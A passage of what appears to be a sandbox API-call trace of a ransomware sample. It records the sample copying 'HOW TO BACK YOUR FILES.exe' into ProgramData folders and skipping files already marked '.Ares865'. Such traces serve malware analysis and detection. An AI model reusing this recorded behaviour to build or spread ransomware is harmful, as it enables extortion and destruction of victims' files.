[0090.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0090.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1908 [0090.122] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0090.122] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0090.122] lstrcmpiW (lpString1="WwanSvc", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.122] lstrcmpiW (lpString1="WwanSvc", lpString2="aoldtz.exe") returned 1 [0090.122] lstrcpyW (in: lpString1=0x2cce45c, lpString2="WwanSvc" | out: lpString1="WwanSvc") returned="WwanSvc" [0090.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0090.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d3148 [0090.122] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.122] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 0 [0090.122] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.122] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.122] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc" [0090.122] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc" [0090.122] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.122] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\wwansvc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.123] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.123] GetLastError () returned 0x0 [0090.123] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.123] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.123] CloseHandle (hObject=0x120) returned 1 [0090.123] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.123] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.123] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.123] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.124] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Profiles" | out: lpString1="Profiles") returned="Profiles" [0090.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0090.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0518 [0090.124] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.124] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 0 [0090.124] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.124] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.124] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles" [0090.124] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles" [0090.124] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.124] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\wwansvc\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.125] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.125] GetLastError () returned 0x0 [0090.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.125] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.125] CloseHandle (hObject=0x120) returned 1 [0090.125] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.125] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.126] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.126] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.126] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT" [0090.126] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT" [0090.126] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.126] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.127] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.127] GetLastError () returned 0x0 [0090.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.127] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.127] CloseHandle (hObject=0x120) returned 1 [0090.127] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.127] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.127] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.127] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.128] lstrcpyW (in: lpString1=0x2cce472, lpString2="MSFax" | out: lpString1="MSFax") returned="MSFax" [0090.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0090.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f0518 [0090.128] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0090.128] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x635d4000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x635d4000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSScan", cAlternateFileName="")) returned 1 [0090.128] lstrcmpiW (lpString1="MSScan", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.128] lstrcmpiW (lpString1="MSScan", lpString2="aoldtz.exe") returned 1 [0090.128] lstrcpyW (in: lpString1=0x2cce472, lpString2="MSScan" | out: lpString1="MSScan") returned="MSScan" [0090.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0090.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0380 [0090.128] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.128] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x635d4000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x635d4000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSScan", cAlternateFileName="")) returned 0 [0090.128] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.128] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.128] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan" [0090.128] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan" [0090.128] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.128] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msscan\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.129] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.129] GetLastError () returned 0x0 [0090.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.129] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.129] CloseHandle (hObject=0x120) returned 1 [0090.129] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.129] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x635d4000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x635d4000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.130] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.130] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.130] lstrcpyW (in: lpString1=0x2cce480, lpString2="WelcomeScan.jpg.Ares865" | out: lpString1="WelcomeScan.jpg.Ares865") returned="WelcomeScan.jpg.Ares865" [0090.130] lstrlenW (lpString="WelcomeScan.jpg.Ares865") returned 23 [0090.130] lstrlenW (lpString="Ares865") returned 7 [0090.130] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.130] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x635fa160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7e450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WelcomeScan.jpg.Ares865", cAlternateFileName="")) returned 0 [0090.130] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.130] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0090.130] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax" [0090.130] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax" [0090.130] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.130] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.131] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.131] GetLastError () returned 0x0 [0090.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.131] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.131] CloseHandle (hObject=0x120) returned 1 [0090.131] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.131] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.132] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.132] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.132] lstrcpyW (in: lpString1=0x2cce47e, lpString2="ActivityLog" | out: lpString1="ActivityLog") returned="ActivityLog" [0090.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0090.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x334fc8 [0090.132] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0090.132] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0090.132] lstrcmpiW (lpString1="Common Coverpages", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.132] lstrcmpiW (lpString1="Common Coverpages", lpString2="aoldtz.exe") returned 1 [0090.132] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Common Coverpages" | out: lpString1="Common Coverpages") returned="Common Coverpages" [0090.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0090.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa2) returned 0x2e2710 [0090.132] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.132] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c33bee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.132] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.132] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Inbox", cAlternateFileName="")) returned 1 [0090.132] lstrcmpiW (lpString1="Inbox", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.132] lstrcmpiW (lpString1="Inbox", lpString2="aoldtz.exe") returned 1 [0090.132] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Inbox" | out: lpString1="Inbox") returned="Inbox" [0090.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0090.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x320fc8 [0090.132] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0090.132] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Queue", cAlternateFileName="")) returned 1 [0090.133] lstrcmpiW (lpString1="Queue", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.133] lstrcmpiW (lpString1="Queue", lpString2="aoldtz.exe") returned 1 [0090.133] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Queue" | out: lpString1="Queue") returned="Queue" [0090.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0090.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x321060 [0090.133] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0090.133] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0090.133] lstrcmpiW (lpString1="SentItems", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.133] lstrcmpiW (lpString1="SentItems", lpString2="aoldtz.exe") returned 1 [0090.133] lstrcpyW (in: lpString1=0x2cce47e, lpString2="SentItems" | out: lpString1="SentItems") returned="SentItems" [0090.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0090.133] 